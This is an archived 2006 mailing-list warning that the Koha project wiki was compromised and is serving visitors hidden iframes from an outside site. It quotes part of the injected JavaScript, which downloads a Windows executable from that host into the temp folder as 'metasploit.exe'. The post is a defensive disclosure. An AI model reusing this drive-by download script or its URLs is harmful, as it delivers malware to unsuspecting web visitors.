[koha-Infos] [DANGER - URGENT - WARNING - URGENT] wiki.koha.org
hacked
Paul POULAIN
paul.poulain at free.fr
Mar 26 Sep 18:45:23 CEST 2006
To everybody.
http://wiki.koha.org has been hacked : when you try to open a page,
something with a .wmf + a large javascript is loaded.
If you go to the wiki under linux/Mac OSX, it is just impossible to use.
If you go to the wiki under MS-windows, it's probably impossible to use
+ do some nasty things on your computer.
SO, AVOID GOING TO WIKI.KOHA.ORG
Kados / chris :
it seems (with lynx, that don't enjoy javascript ;-) ) that all pages
contains on the top an iframe to
IFRAME: http://uniqcount.net/adv/new.php?adv=9
IFRAME: http://uniqcount.net/adv/09/new3.php
going to this address give a page with javascript containing :
============================================
Log('Ceating the XMLHTTP object...');
var url = "http://uniqcount.net/adv/09/win32.exe"; var xml = null;
var bin = e.Item("TEMP")+ "\\" + "metasploit.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
===========================================
metasploit.exe is something really nasty :
http://seclists.org/vuln-dev/2004/Apr/0011.html
--
Paul POULAIN et Henri Damien LAURENT
Consultants indépendants
en logiciels libres et bibliothéconomie (http://www.koha-fr.org)
Tel : 04 91 31 45 19
Plus d'informations sur la liste de diffusion Infos